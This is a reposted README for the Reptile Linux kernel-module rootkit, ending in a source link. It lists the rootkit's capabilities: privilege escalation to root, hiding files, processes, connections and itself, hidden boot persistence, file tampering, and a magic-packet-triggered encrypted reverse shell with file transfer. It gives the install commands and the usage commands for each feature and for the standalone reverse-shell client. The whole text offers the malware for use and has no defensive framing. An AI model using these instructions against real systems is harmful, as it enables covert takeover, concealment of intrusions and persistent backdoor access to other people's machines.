Reptile: LKM Linux rootkit

Reptile

LKM Linux rootkit

Tested on

Debian 9: 4.9.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide himself
  • Hide TCP/IP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)

Install

apt-get install linux-headers-$(uname -r)
perl -MCPAN -e “install String::Unescape”
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install

Uninstall

./setup.sh remove

Usage

Give root to unprivileged users

To get root privileges just type: /reptile/reptile_cmd root

Hide files, directories and kernel module

All files and folders that has reptile in the name will be hidden. You can configure this in the installation script. The following commands hide/unhide files, folders, processes and kernel module.

To hide: /reptile/reptile_cmd hide 
To unhide: /reptile/reptile_cmd show

Hide processes

To hide processes: /reptile/reptile_cmd hide <pid> 
To unhide processes: /reptile/reptile_cmd show <pid>

Hide TCP/IP connections

Hide: /reptile/reptile_cmd conn <IP> <port> hide 
Unhide: /reptile/reptile_cmd conn <IP> <port> show

File content tampering

All content between tags will be hidden:

#<reptile> 
content to hide 
#</reptile>

You can configure these tags in the installation script.

Backdoor

The backdoor is a reverse shell triggered by a magic packet sent via TCP, UDP or ICMP protocol.

Client

Compiling:

./setup client

The client is MSF-like and its usage is very easy. Run ./client and just type help to see the commands.

 

There are another two binaries: listener and packet. The client binary will handle listener and packet but you can use them separately if you want:

 

Shell

The shell easy to use, just type help to see the commands.

  • It already hide its process and connection.
  • Its connection is encrypted
  • There is a file uploader and file downloader inside.
  • You can set a delay to receive a reverse connection every time you want.
  • If you run shell you will get a full TTY/PTY shell like ssh.

 

You can compile this shell in a standalone version to use without the Kernel Module:

./setup reverse

You will need to use listener to connect with the standalone reverse shell because you won’t send magic packets. Just compile with ./setup client and use listener binary!

Source: https://github.com/f0rb1dd3n/

Share